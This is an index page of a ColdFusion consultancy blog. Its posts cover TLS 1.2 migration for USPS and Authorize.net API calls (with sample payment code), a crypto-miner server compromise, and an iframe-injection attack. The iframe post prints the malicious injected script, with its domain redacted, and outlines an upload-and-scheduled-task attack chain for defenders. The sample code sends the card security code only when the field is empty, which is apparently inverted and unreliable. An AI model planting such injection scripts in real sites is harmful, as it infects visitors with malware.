ColdFusion Muse

USPS Shipping API Ending TLS 1.1 and TLS 1.0 Support, is your ColdFusion Server Ready?

At CF Webtools we recently went through a round of server upgrades to handle the Authorize.net ending support for older TLS versions. Now USPS, United State Postal Service, is doing the same thing with their Shipping APIs. This is going to be happening for all API's and most likely all this year as PCI requirements for ending support for TLS 1.1 and older at the end of June 2018. This is according to the PCI Security Standards Council.

USPS will be turning off support for TLS 1.1 and older for testing. In advance of the changes to production, TLS version 1.0 and 1.1 support will be discontinued in the lower Web Tools environments and available for testing on 5/22/18: https://stg-secure.shippingapis.com/shippingapi.dll): 06/11/18.

This message explains some security improvements planned for our services. Effective 06/22/18, Web Tools will discontinue support of Transport Layer Security (TLS) version 1.0 and 1.1 for securing connections to our HTTPS APIs through the following URL: https://stg-secure.shippingapis.com/shippingapi.dll. This includes, but is not limited to, all shipping label and package pickup APIs. After this change, integrations leveraging TLS version 1.0 and 1.1 will fail when attempting to access the APIs.

You are receiving this message because the Web Tools UserID associated with your email address has made HTTPS requests over the past year. It is possible that no changes are necessary to retain Web Tools services and benefit from the improvements. Please review the entire message carefully and share with your web developer, software vendor, or IT service provider to determine if your use of the Web Tools APIs will be affected. If you have already updated your security certificates please disregard this message. If you are not sure if any changes are necessary, please ask your IT service provider.

In advance of the changes to production, TLS version 1.0 and 1.1 support will be discontinued in the lower Web Tools environments and available for testing on 5/22/18: https://stg-secure.shippingapis.com/shippingapi.dll): 06/11/18.

Further background: Security research published in recent years demonstrated that TLS version 1.0 and 1.1 contained weaknesses that limited its ability to protect and secure communications. These weaknesses have been addressed in the TLS 1.2 version. Major browser software vendors have been supporting TLS 1.2 for some time. Consistent with our priority to protect USPS Web Tools customers, Web Tools will only support versions of the more modern TLS 1.2 as of the effective date noted above.

Contact us at WebTools@usps.gov with any questions or concerns.

This means that if you are using older methods to make calls to USPS that are not capable of making TLS 1.2 connections then you will NOT be able to process Shipping API transactions.

This affects ALL ColdFusion versions 9.0.2 and older! This also affects ColdFusion 10 Update 17 and older. If your server is running any of these older versions of ColdFusion and your server is processing Shipping API transactions with USPS then this advisory applies to your server.

Mitigation Getting compliant depends on age of your server operating system. There are three main ways to get your server to handle TLS 1.2.

  1. If you're running on Windows Server 2008 Standard (not R2) or older then the only solution is to migrate to a newer server. This can be challenging and time consuming. It's best to start planning now if a plan isn't already in place and being acted upon.
  2. If your server is running ColdFusion 10 and newer on Windows 2008 or newer then the solution is most likely very simple. In most cases you'll need to install the ColdFusion patches and upgrade to Java 1.8.0_nn.
  3. There is a solution for the in between systems running ColdFusion 9 and older on Windows 2008 R2. This does require using a third party extension to ColdFusion and some refactoring of your code to call the API.
  4. There are sure to be outlier cases that will require either migration or patching depending on the exact combination of operating system, ColdFusion version and Java version.

CF Webtools has been successfully mitigating this issue for clients servers for the past couple years and we are very experienced in resolving these security related issues. In a previous blog post I tested which TLS levels were supported by various ColdFusion versions on various Java versions and produced an easy to read chart.

If your ColdFusion server is affected by this or if you do not know if your ColdFusion server is affected by this then please contact us (much) sooner than later. Our operations group is standing by 24/7 - give us a call at 402-408-3733, or send a note to operations at cfwebtools.com.

How to handle TLS1.2 for ColdFusion 9 and Older

The upcoming Authorize.NET switch to using TLS 1.2 only has a lot of people scrambling to get their servers updated. This has been a long planned transition at Authorize.NET and at many/most/all other payment processing companies. The inevitable facts are that TLS 1.0 and TLS 1.1 are outdated and they are going away. CF Webtools we have been preparing for this inevitable day for the past few years.

ColdFusion 9.0.n is not tested to work on Java 1.8 and I have had cases were certain features of ColdFusion 9 did not work with Java 1.8. I have not tried any older versions of ColdFusion on Java 1.8 and I'm not going to. Adobe has not certified any versions of ColdFusion older than version 10 Update 14 (or ColdFusion 11 Update 2 and older). All of that being said, there is a workaround that uses a 3rd party commercial solution to make TLS 1.2 connections from ColdFusion 9. It works well, but I do not recommend that as a long term solution. The preferred long term solution is upgrading the server(s) and ColdFusion version to currently supported versions. This way there will be security updates to help protect against new threats. The commercial third-party CFX tag will require recoding the CFHTTP calls for the new CFX tag. The tag is CFX_HTTP5 and it is available here.

Follow the installation instructions that comes with the download and then you will have to recode your CFHTTP calls similar to the examples below. The code examples are for the older Authorize.NET Advanced Integration Method (AIM) API calls that you are most likely using in your older ColdFusion CFHTTP calls.

<cfset authURL = "https://test.authorize.net/gateway/transact.dll" />
<cfif AuthNetMode eq "live">
<cfset authURL = "https://secure.authorize.net/gateway/transact.dll" />
</cfif>

<!--- CFHTTP Call - Your code might look something like this --->
<cfhttp url="#authURL#" method="post" result="cfhttp">
<cfhttpparam type="FORMFIELD" name="x_Login" value="#AuthLogin#">
<cfhttpparam type="FORMFIELD" name="x_Password" value="#AuthPassword#">
<cfhttpparam type="FORMFIELD" name="x_merchant_email" value="#AuthEmail#">
<cfhttpparam type="FORMFIELD" name="x_delim_data" value="true">
<cfhttpparam type="FORMFIELD" name="x_test_request" value="#x_test_request#">

<!--- we're using AUTH_ONLY so the card isn't charged until the order is processed --->
<cfhttpparam type="FORMFIELD" name="x_type" value="AUTH_ONLY">
<cfhttpparam type="FORMFIELD" name="x_method" value="cc">

<cfhttpparam type="FORMFIELD" name="x_amount" value="#orderTotal#">
<cfhttpparam type="FORMFIELD" name="x_card_num" value="#cardNumber#">
<cfhttpparam type="FORMFIELD" name="x_exp_date" value="#cardExpiration#">
<cfif isDefined("cardSecurityCode") and cardSecurityCode eq "">
<cfhttpparam type="FORMFIELD" name="x_card_code" value="#cardSecurityCode#">
</cfif>

<!--- If you want an email to go to the customer via authorize.net change this to true. Make sure authorize.net is configured properly. --->
<cfhttpparam type="FORMFIELD" name="x_email_customer" value="#x_email_customer#">

<cfhttpparam type="FORMFIELD" name="x_first_name" value="#billingFirstName#">
<cfhttpparam type="FORMFIELD" name="x_last_name" value="#billingLastName#">
<cfhttpparam type="FORMFIELD" name="x_company" value="#billingCompany#">
<cfhttpparam type="FORMFIELD" name="x_address" value="#billingAddress#">
<cfhttpparam type="FORMFIELD" name="x_city" value="#billingCity#">
<cfhttpparam type="FORMFIELD" name="x_state" value="#billingState#">
<cfhttpparam type="FORMFIELD" name="x_zip" value="#billingZip#">
<cfhttpparam type="FORMFIELD" name="x_country" value="#billingCountry#">

<cfhttpparam type="FORMFIELD" name="x_customer_ip" value="#cgi.remote_address#">
<cfhttpparam type="FORMFIELD" name="x_Email" value="#billingEmail#">
<cfhttpparam type="FORMFIELD" name="x_Phone" value="#billingPhone#">

<cfhttpparam type="FORMFIELD" name="x_ship_to_first_name" value="#shippingFirstName#">
<cfhttpparam type="FORMFIELD" name="x_ship_to_last_name" value="#shippingLastName#">
<cfhttpparam type="FORMFIELD" name="x_ship_to_company" value="#shippingCompany#">
<cfhttpparam type="FORMFIELD" name="x_ship_to_address" value="#shippingAddress#">
<cfhttpparam type="FORMFIELD" name="x_ship_to_city" value="#shippingCity#">
<cfhttpparam type="FORMFIELD" name="x_ship_to_state" value="#shippingState#">
<cfhttpparam type="FORMFIELD" name="x_ship_to_zip" value="#shippingZip#">
<cfhttpparam type="FORMFIELD" name="x_ship_to_country" value="#shippingCountry#">
<cfhttpparam type="FORMFIELD" name="x_Description" value="#description#">
<cfhttpparam type="FORMFIELD" name="x_invoice_num" value="#invoicenum#">
</cfhttp>

<cfset response = cfhttp.fileContent>

To refactor your code you will want to do something like this.

<cfset authURL = "https://test.authorize.net/gateway/transact.dll" />
<cfif AuthNetMode eq "live">
<cfset authURL = "https://secure.authorize.net/gateway/transact.dll" />
</cfif>
<!--- CFX_HTTP5 Call - You'll want to refactor your code in this fashion --->

<cfset httpBody = "x_Login=#AuthLogin#&
x_Password=#AuthPassword#&
x_merchant_email=#AuthEmail#&
x_delim_data=true&
x_test_request=#x_test_request#&
x_type=AUTH_ONLY&
x_method=cc&
x_amount=#orderTotal#&
x_card_num=#cardNumber#&
x_exp_date=#cardExpiration#&
x_first_name=#billingFirstName#&
x_last_name=#billingLastName#&
x_company=#billingCompany#&
x_address=#billingAddress#&
x_city=#billingCity#&
x_state=#billingState#&
x_zip=#billingZip#&
x_country=#billingCountry#&
x_customer_ip=#cgi.remote_address#&
x_Email=#billingEmail#&
x_Phone=#billingPhone#&
x_ship_to_first_name=#shippingFirstName#&
x_ship_to_last_name=#shippingLastName#&
x_ship_to_company=#shippingCompany#&
x_ship_to_address=#shippingAddress#&
x_ship_to_city=#shippingCity#&
x_ship_to_state=#shippingState#&
x_ship_to_zip=#shippingZip#&
x_ship_to_country=#shippingCountry#&
x_Description=#description#&
x_invoice_num=#invoicenum#"
>


<!--- If you want an email to go to the customer via authorize.net change this to true. Make sure authorize.net is configured properly. --->
<cfset httpBody = httpBody & "&x_email_customer=#x_email_customer#">

<cfif isDefined("cardSecurityCode") and cardSecurityCode eq "">
<cfset httpBody = httpBody & "&x_card_code=#cardSecurityCode#">
</cfif>

<cfset cfxhttp = {}>
<cfset headers = "Content-Type: application/x-www-form-urlencoded">
<cfx_http5 url="#authURL#" method="post" out="cfxhttp.body" outqhead="cfxhttp.QHEAD" outhead="cfxhttp.RHEAD" ssl="5" body="#httpBody#" header="#headers#">
</cfx_http5>

<cfset response = cfxhttp.body>

The code is a minor change and relatively easy to do. I've tested this method in a production environment and it works fine. I do not recommend this as a long term solution. The preferred long term solution is upgrading the server(s) and ColdFusion version to currently supported versions. This way there will be security updates to help protect against new threats. If you are on ColdFusion 10 or 11 then the best option is to install the ColdFusion patches and upgrade the Java version to 1.8 then you will be good to go. If you need an experience ColdFusion developer to make these changes then please do contact us, we will be happy to assist.

This is one more friendly reminder to make sure your ColdFusion servers are patched! Either patch them yourself, have your hosting provider patch them. If you need help upgrading your VM or patching your server (or anything else) our operations group is standing by 24/7 - give us a call at 402-408-3733, or send a note to operations at cfwebtools.com.

UPDATE: This fix will not work for Windows 2003 Server as there is no support from Microsoft for TLS 1.1 or 1.2 in this server version.

Cryptocurrency Miners Hacking Servers

Are your free CPU cycles making others rich? There's a chance they are and it's at your expense. A recent article at Vice.com states that "At Least 1.65 Million Computers Are Mining Cryptocurrency for Hackers So Far This Year". If this is to be believed then it's possible a server you are running has been compromised and is actually mining cyrptocurrency for the hackers.

Cyrptocurrency is an anonymous, digital currency that is supposed to be untraceable. It's used on the internet to purchase more and more products and services. One of the most common forms of cryptocurrency is Bitcoin. This is from the Wikipedia entry on Bitcoin.

Bitcoin is a worldwide cryptocurrency and digital payment system called the first decentralized digital currency, since the system works without a central repository or single administrator. It was invented by an unknown programmer, or a group of programmers, under the name Satoshi Nakamoto and released as open-source software in 2009. The system is peer-to-peer, and transactions take place between users directly, without an intermediary. These transactions are verified by network nodes and recorded in a public distributed ledger called a blockchain. Besides being created as a reward for mining, bitcoin can be exchanged for other currencies, products, and services. As of February 2015, over 100,000 merchants and vendors accepted bitcoin as payment. Bitcoin can also be held as an investment. According to research produced by Cambridge University in 2017, there are 2.9 to 5.8 million unique users using a cryptocurrency wallet, most of them using bitcoin. ...

Bitcoin Mining is a record-keeping service that runs on peoples computers, servers, or specialized Mining Devices, that are setup by individuals to help process Bitcoin transactions. As a reward for doing this you are given newly created bitcoins and transaction fees. ie. You can make money by mining for Bitcoin.

This reward is enough that hackers have taken it to the next level and started hacking servers around the world so they can install mining software and use YOUR computers and servers to make money for themselves. Just this week it was discovered that some of Showtime's web servers were mining cryptocurrency. This isn't a new thing either. Back in 2014 Iowa State University servers were also hacked for the purpose on mining Bitcoins. These are not isolated occurrences. They are happening regularly. This practice is free to the hackers an costly to the owners of the servers. Here's why.

Case Study

CF Webtools has seen this type of hack in the real world. We recently had a company come to us seeking our services for both Server Administration and ColdFusion programming. Part of taking this new company on as a client we performed a security review on all of their servers. They also had existing issues that we needed to look at in particular. One of their web servers was rebooting multiple times per day at what seemed like "random" intervals.

Upon review we found the web server was always running at 100% CPU usage with no services claiming to be using that much CPU power. Certainly not ColdFusion or IIS. After completing additional research we decided to install a malware removal tool and scanned for malware. It didn't take long to find that indeed there was malware running on the server. What we found surprised us only because we had not seen this in action before. It was a cryptocurrency miner and it was so intensive that it would crash the server. All attempts to remove the malware failed. It would end up back on the server in a short period of time. The fact is this server was compromised. To resolve the issue we sent one of our decommissioned, but powerful servers, preinstalled with a clean OS to their data center. Then our Operations Manager went on the road to install the new server as well as a physical firewall. We essentially rearchitected their entire server setup. Meanwhile the malware removal tool did it's best to keep the malware at bay while I recreated their web server on the new server. It was a busy week (or more), but we were able to clean the code on the clients server and put that on the new server. We also had to research and rebuild all the dependancies from scratch. When it was all said and done we replaced the compromised server with the new one and put all their servers behind a Cisco ASA.

This case of Hacking for Bitcoins proved costly in the end to the company who's systems were compromised all while providing a free profit to the hacker(s).

This is one more friendly reminder to make sure your ColdFusion servers are patched! Either patch them yourself, have your hosting provider patch them. If you need help upgrading your VM or patching your server (or anything else) our operations group is standing by 24/7 - give us a call at 402-408-3733, or send a note to operations at cfwebtools.com.

VB Script For Iframe Injection Attack

Thanks to Nate from CF-Talk I have a copy of the malicious VBS script that is doing the damage. If you are being victimized by this attack and you need to see the script for whatever purpose, let me know and I will make sure you get a copy. I now it goes without saying, but just don't run it :).

Meanwhile there is some consensus, given the root access of this code, that an infected server cannot be trusted even after a thorough cleaning. Dave Watts and Tom Chiverton both gave such advice. While it's not always possible and it's a huge hassle, it might be the best solution to bite the bullet and do it.

Iframe Injection Follow Up

For those of you who have been following the Iframe injection attack saga (see Iframe Insertion on Index.* Home pages) I have an update. I would like to thank one of my readers named Kumar for referring me to this excellent article (a PDF File) on Black Hat. The article seems to pinpoint the origin and nature of the attack. The document describes an attack in depth with multiple steps (just as we had speculated). The first step was an SQLi attempt. But failing that the attacker compromised the server in a rather ingenious fashion.

  • Using an image upload capability he uploaded a file to the server that "looked" like an image but was not.
  • The file (containing executable code) was then hit with GET and POST requests.
  • The payload of the get and post requests was able to set up scheduled tasks to append the JS code to "index.*" files on a timed basis.

This file that was uploaded was a CDX file. On a properly configured IIS server this attack would fail to succeed. Here's why.

[More]

Iframe Insertion on Index.* Home pages

There's a hack that's beginning to be active that targets pages named "index.*". Actually it sounds rather like an old hack that is resurfacing. Since many ColdFusion sites use this convention for the home page this attack tends to hit quite a few ColdFusion sites that are vulnerable. The attack appends a script like this one to the bottom of each "index.*" page:

<sc ript>
var applstrna0 = " ;
var applstrna1 = "rame src=http://***Domain Host Name****";
var applstrna2 = ".com/bb/faq.htm";
var applstrna3 = " width=100 height=0> ;
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
</script>
Please note that I have not included the actual url of this attack. The domain includes the string "said7". I am only making sure I mention said7 so that folks searching for info on this attack can find this specific post and possibly be helped. I have no wish to benefit the said7 effort and I hope they all get dysentery and spend the weekend in the latrine.

As you can see the script itself is pretty simple. It writes out an invisible Iframe to the bottom of the page. The target of the Iframe attempts to download a trojan or malware to the users machine. This attack is insidious and I have yet to discover the origin. But I do know a few things about it - and how to prevent it from continuing. One important thing to note, if you have this problem and Google indexes your sites and sees these pages they will flag your site. Browsers like Firefox use the Google service to throw up a big "malware" warning.

The following article details the attack and the notes I've gathered about it. Some day soon I hope to post a more definitive who, what, when and why post about it. To gather the following notes I'm indebted to the folks on the CF-Talk List (this thread), Nathan, Nick, Jason, Scott, Don and probably a few others I am forgetting. I can't give away too much info here - but please accept my thanks.

[More]

Bob and Mary - HTML Injection Wars

I promised some information from the seminar on application security by Shlomy Gantz. This post is the first of what I hope is 3 or 4 posts unveiling some little thought about security issues when you are doing application programming. Of course we all know about cross site scripting (XSS), SQL injection attack (SIA) and acronym overload seizure (AOS). If you don't, you can find examples of the first two in part IV of my series on the Security Pyramid. In this article I'd like to explore what Shlomy called "HTML Injection". Now I knew that this little gem existed but mostly I thought of it as a XSS attack - where a user is able to place JavaScript designed to steal information from other unsuspecting users into a page (as in my cookie example). What Shlomy did was much harder to detect.

[More]

Podcast: The Security Pyramid Part IV - Securing Your Code

This is the fourth and final episode in the series, "the security pyramid". This entry covers the topic of "Personal Health", securing your application code. We cover cross site scripting, SQL injection attacks and a number of other topics. This podcast is nearly half an hour long. The examples I talk about in the podcast are covered in the original post. Posts from the other 4 parts of the series are listed below. Thanks for listening!

Listen Here



Security Pyramid Podcast - Part III (The Neighborhood)

This is the third in a series of 4 podcasts (I know, it was supposed to be 3) on the subject of "the security pyramid". This one covers the topic of "the neighborhood" where your application lives. The topic covers security issues related to your server configuration, coldfusion, and integration with external resources. All of the material covered in the podcasts is also covered in the 5 posts listed below, although the podcasts often include items that are not in the posts. Click on Part III below for the written vresion of this particular podcast. Thanks for listening!

Listen Here



Security Pyramid Podcast - Part II

This is the second of 3 podcasts on the subject of "the security pyramid". This one covers the topic of "internal network policy". All of the material covered in the podcasts is also covered in the 5 posts listed below, although the podcasts often include items that are not in the posts. Thanks for listening!

Listen Here



Security Pyramid Podcast - Part I

This podcasts covers the first 2 sections of my recent series on the security pyramid, the introduction and the border patrol. The podcasts often include items that are not in the posts. Thanks for listening!

Listen Here

The Application Security Pyramid - Securing Your Code

Is your site vulnerable to SQL Injection Attack? How about Cross Site Scripting? Are you even sure you know enough about those 2 vulnerabiities to protect against them?

This post is a continuation of a 5 part series on security called "The Application Security Pyramid". The introduction introduced a new metaphor for dealing with security that loosely mimics Maslow's heirarchy of self-actualization. In Part I I discussed the importance of "border patrol" technology to safeguard your network. In part II I discussed internal Policing and People Policy. In Part III I discussed the importance of managing the security framework of your actual application and how it relates to it's specific environment. In this, our final post in the series, we will discuss securing your application code itself.

[More]

The Application Security Pyramid - Neighborhood Watch

This post is a continuation of a 5 part series on security called "The Application Security Pyramid". The introduction introduced a new metaphor for dealing with security that loosely mimics Maslow's heirarchy of self-actualization. In Part I I discussed the importance of "border patrol" technology to safeguard your network. In part II I discussed internal Policing and People Policy. In this post we will deal with the importance of maintinaing a secure "environment" for your application.

[More]

The Application Security Pyramid - Policing and People Policy

This post is a continuation of a 5 part series on security called "The Application Security Pyramid". The introduction introduced a new metaphor for dealing with security that loosely mimics Maslow's heirarchy of self-actualization. In Part I I discussed the importance of "border patrol" technology to safeguard your network. This post will deal with internal Policing and People Policy.

It's not enough to have effective border agents to feel safe. We also have to have effective policing inside our borders. After all, there are people here who are forced to work for the post office and they need watching. A system of policing and civil services keep us operating in safety and harmony with one another. This is the next two blocks on our pyramid - internal policing and people policy.

[More]

The Application Security Pyramid - The Border

In my Previous Post I introduced a new metaphor for thinking about security. The purpose of this metaphor is to give us a framework for discussing the topic with stakeholders who have a cavalier attitude toward security, or who have fallen into the habit of relying on mere network security to keep them safe. We discussed how current metaphors that are physical in nature don't do enough to encompass the whole realm of security when it comes to addressing a specific application. A new metaphor is needed. I came up with a model based on Maslow's hierarchy of self-actualization (it sounds pompous but hey - it works for me). If you want to know more, read on.

[More]

More Entries




Blog provided and hosted by CF Webtools. Blog Sofware by Ray Camden.